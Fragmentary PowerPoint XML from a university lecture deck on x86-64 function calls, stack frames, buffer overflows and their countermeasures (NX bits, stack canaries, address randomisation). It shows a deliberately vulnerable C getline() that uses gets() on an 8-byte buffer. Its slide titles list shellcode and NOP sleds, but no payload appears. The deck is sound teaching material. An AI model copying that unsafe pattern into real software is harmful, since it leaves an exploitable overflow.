            <a:pPr marL="385763" indent="-38258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altLang="en-US" dirty="0" smtClean="0">
              <a:ea typeface="+mn-ea"/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066800" y="1905000"/>
            <a:ext cx="6324600" cy="2338388"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF99"/>
          </a:solidFill>
          <a:ln w="3240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char *getline()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char buf[8];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char *result;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gets(buf);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result = malloc(strlen(buf));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strcpy(result, buf);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	return(result);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Hardware support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25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2800" dirty="0" smtClean="0"/>
              <a:t>No-Execute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/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Non-executable memory segments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Traditional </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>x86, can mark region of memory as either “read-only” or “writeable”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/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Can execute anything readable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="741363" lvl="1" indent="-2444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dirty="0" smtClean="0"/>
              <a:t>x86-64 (finally) added explicit “execute” permission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NX (No-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>eXecute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>) bits mark memory pages such as the stack that should not include instructions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altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Stack should always be marked non-executable</a:t>
            </a:r>
          </a:p>
          <a:p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3) Compiler tricks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838200" y="3429000"/>
            <a:ext cx="8001000" cy="1068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2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781550" y="2552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4933950" y="2705100"/>
            <a:ext cx="24384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Return address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4781550" y="3314700"/>
            <a:ext cx="2743200" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="008000"/>
          </a:solidFill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5238750" y="3467100"/>
            <a:ext cx="19812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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="32" charset="-127"/>
              </a:rPr>
              <a:t>Canary Value</a:t>
            </a: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4781550" y="4076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4857750" y="4076700"/>
            <a:ext cx="26670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Old base pointer (Saved Frame Pointer)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38922" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4781550" y="4838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4886325" y="5067300"/>
            <a:ext cx="25622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Local Variables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38924" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="8150225" y="1419225"/>
            <a:ext cx="15875" cy="5000625"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="7632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Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7467600" y="762000"/>
            <a:ext cx="14763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  <a:ea typeface="굴림" pitchFamily="32" charset="-127"/>
              </a:rPr>
              <a:t>Stack grows high to low</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38926" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4781550" y="1790700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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000066"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000066"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>args</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US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38927" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4781550" y="5610225"/>
            <a:ext cx="2743200" cy="7620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marL="533400" indent="-530225" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1250"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone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2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>StackGuard</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-4572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1800" dirty="0" smtClean="0"/>
              <a:t>Canaries in a function call coal mine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-4572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1800" dirty="0" smtClean="0"/>
              <a:t>Add code to insert a canary value into the stack for each function call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-4572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1800" dirty="0" smtClean="0"/>
              <a:t>Check that canary is intact before returning from a function call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-4572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1800" dirty="0" smtClean="0"/>
              <a:t>Canary randomized every time program is run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-4572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1800" dirty="0" smtClean="0"/>
              <a:t>Always contains a NULL byte to prevent buffer overruns past the return address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-530225" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1250"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="533400" algn="l"/>
                <a:tab pos="646113" algn="l"/>
                <a:tab pos="1103313" algn="l"/>
                <a:tab pos="1560513" algn="l"/>
                <a:tab pos="2017713" algn="l"/>
                <a:tab pos="2474913" algn="l"/>
                <a:tab pos="2932113" algn="l"/>
                <a:tab pos="3389313" algn="l"/>
                <a:tab pos="3846513" algn="l"/>
                <a:tab pos="4303713" algn="l"/>
                <a:tab pos="4760913" algn="l"/>
                <a:tab pos="5218113" algn="l"/>
                <a:tab pos="5675313" algn="l"/>
                <a:tab pos="6132513" algn="l"/>
                <a:tab pos="6589713" algn="l"/>
                <a:tab pos="7046913" algn="l"/>
                <a:tab pos="7504113" algn="l"/>
                <a:tab pos="7961313" algn="l"/>
                <a:tab pos="8418513" algn="l"/>
                <a:tab pos="8875713" algn="l"/>
                <a:tab pos="9332913" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea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Linux/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> implementation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Default option</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pP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220980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b="1" i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b="1" i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724400" y="220980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b="1" i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  <a:endParaRPr lang="en-US" sz="1600" b="1" i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14400" y="3124200"/>
            <a:ext cx="6461125" cy="353686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40072f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sub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endParaRPr lang="sk-SK" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF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400741: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400743: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400746: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40074b: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40074e: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400753:	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400761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je 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400763:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" b="1" dirty="0" smtClean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600" b="1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400768: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add    </a:t>
            </a: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600" b="1" dirty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40076c:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>retq </a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill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28223</TotalTime>
  <Words>7719</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>2447</Paragraphs>
  <Slides>119</Slides>
  <Notes>84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0" baseType="lpstr">
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Procedures (Functions)</vt:lpstr>
      <vt:lpstr>Functions</vt:lpstr>
      <vt:lpstr>x86-64 stack</vt:lpstr>
      <vt:lpstr>Stack Pushing</vt:lpstr>
      <vt:lpstr>Stack Popping</vt:lpstr>
      <vt:lpstr>Stack Operation Examples</vt:lpstr>
      <vt:lpstr>Control Flow terminology</vt:lpstr>
      <vt:lpstr>Control Flow</vt:lpstr>
      <vt:lpstr>Control Flow Example #1</vt:lpstr>
      <vt:lpstr>Control Flow Example #2</vt:lpstr>
      <vt:lpstr>Control Flow Example #3</vt:lpstr>
      <vt:lpstr>Control Flow Example #4</vt:lpstr>
      <vt:lpstr>Practice problem</vt:lpstr>
      <vt:lpstr>Function calls and stack frames</vt:lpstr>
      <vt:lpstr>Call Chain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x86-64/Linux Stack Frame (aside)</vt:lpstr>
      <vt:lpstr>Function arguments</vt:lpstr>
      <vt:lpstr>swap revisited</vt:lpstr>
      <vt:lpstr>Function arguments beyond 6</vt:lpstr>
      <vt:lpstr>Local variables</vt:lpstr>
      <vt:lpstr>Local variables</vt:lpstr>
      <vt:lpstr>Scoping issues with local variables</vt:lpstr>
      <vt:lpstr>Putting it all together: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x86-64 caller-saved registers</vt:lpstr>
      <vt:lpstr>x86-64 callee-saved registers</vt:lpstr>
      <vt:lpstr>x86-64 Integer Registers</vt:lpstr>
      <vt:lpstr>Callee-Saved Example #1</vt:lpstr>
      <vt:lpstr>Callee-Saved Example #2</vt:lpstr>
      <vt:lpstr>Floating point arguments</vt:lpstr>
      <vt:lpstr>Optimizations: Explain the jump</vt:lpstr>
      <vt:lpstr>32-bit calling conventions</vt:lpstr>
      <vt:lpstr>32-bit calling conventions</vt:lpstr>
      <vt:lpstr>Function pointers </vt:lpstr>
      <vt:lpstr>Pointers</vt:lpstr>
      <vt:lpstr>Function pointers</vt:lpstr>
      <vt:lpstr>Function pointers</vt:lpstr>
      <vt:lpstr>Function pointers example</vt:lpstr>
      <vt:lpstr>Dynamic linking via function pointers</vt:lpstr>
      <vt:lpstr>In practice</vt:lpstr>
      <vt:lpstr>Slide 58</vt:lpstr>
      <vt:lpstr>Stack smashing</vt:lpstr>
      <vt:lpstr>Stack smashing (buffer overflow)</vt:lpstr>
      <vt:lpstr>Recall function calls</vt:lpstr>
      <vt:lpstr>Stack Frame</vt:lpstr>
      <vt:lpstr>Simple program</vt:lpstr>
      <vt:lpstr>Simple program</vt:lpstr>
      <vt:lpstr>Simple program 2</vt:lpstr>
      <vt:lpstr>Simple program 2</vt:lpstr>
      <vt:lpstr>Buffer Overflow</vt:lpstr>
      <vt:lpstr>Buffer Overflow</vt:lpstr>
      <vt:lpstr>Buffer Overflow</vt:lpstr>
      <vt:lpstr>New diagram</vt:lpstr>
      <vt:lpstr>Buffer Overflow (Idealized)</vt:lpstr>
      <vt:lpstr>Buffer Overflow</vt:lpstr>
      <vt:lpstr>Buffer Overflow</vt:lpstr>
      <vt:lpstr>Insertion address</vt:lpstr>
      <vt:lpstr>Insertion address</vt:lpstr>
      <vt:lpstr>Setting return address </vt:lpstr>
      <vt:lpstr>NOP Sled</vt:lpstr>
      <vt:lpstr>Buffer Overflow</vt:lpstr>
      <vt:lpstr>Malicious code injection</vt:lpstr>
      <vt:lpstr>Spawning root shells</vt:lpstr>
      <vt:lpstr>Some issues to take care of…</vt:lpstr>
      <vt:lpstr>Shellcode example</vt:lpstr>
      <vt:lpstr>Armed with shellcode now</vt:lpstr>
      <vt:lpstr>Buffer overflow example</vt:lpstr>
      <vt:lpstr>Buffer Overflow vulnerability</vt:lpstr>
      <vt:lpstr>Buffer Overflow Disassembly</vt:lpstr>
      <vt:lpstr>Buffer Overflow Stack Example</vt:lpstr>
      <vt:lpstr>Buffer Overflow Stack</vt:lpstr>
      <vt:lpstr>Buffer Overflow Stack Example #1</vt:lpstr>
      <vt:lpstr>Buffer Overflow Stack Example #2</vt:lpstr>
      <vt:lpstr>Buffer Overflow Stack Example #3</vt:lpstr>
      <vt:lpstr>Buffer Overflow Stack Example #3</vt:lpstr>
      <vt:lpstr>Homework</vt:lpstr>
      <vt:lpstr>Counter-measures</vt:lpstr>
      <vt:lpstr>1) Better code (Practice Problem)</vt:lpstr>
      <vt:lpstr>Practice problem</vt:lpstr>
      <vt:lpstr>2) Hardware support</vt:lpstr>
      <vt:lpstr>3) Compiler tricks</vt:lpstr>
      <vt:lpstr>Linux/gcc implementation</vt:lpstr>
      <vt:lpstr>Setting Up Canary</vt:lpstr>
      <vt:lpstr>Checking Canary</vt:lpstr>
      <vt:lpstr>4) Address Space Layout Randomization</vt:lpstr>
      <vt:lpstr>Other randomization techniques</vt:lpstr>
      <vt:lpstr>Lessons from Multics</vt:lpstr>
      <vt:lpstr>Extra slides (Functions)</vt:lpstr>
      <vt:lpstr>Recursive Procedures</vt:lpstr>
      <vt:lpstr>Recursive Factorial</vt:lpstr>
      <vt:lpstr>Function argument example</vt:lpstr>
      <vt:lpstr>Function argument example (w/ caller)</vt:lpstr>
      <vt:lpstr>Function pointer extra slides</vt:lpstr>
      <vt:lpstr>Slide 111</vt:lpstr>
      <vt:lpstr>Slide 112</vt:lpstr>
      <vt:lpstr>Slide 113</vt:lpstr>
      <vt:lpstr>Slide 114</vt:lpstr>
      <vt:lpstr>Slide 115</vt:lpstr>
      <vt:lpstr>Slide 116</vt:lpstr>
      <vt:lpstr>Extra stack smashing</vt:lpstr>
      <vt:lpstr>ASCII armor</vt:lpstr>
      <vt:lpstr>Other randomization techniques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creator>Randal E. Bryant and David R. O'Hallaron</dc:creator>
  <cp:lastModifiedBy>user</cp:lastModifiedBy>
  <cp:revision>674</cp:revision>
  <cp:lastPrinted>1998-08-31T18:34:23Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">1998-08-11T09:19:24Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-02-06T17:45:30Z</dcterms:modified>
</cp:coreProperties>
</file>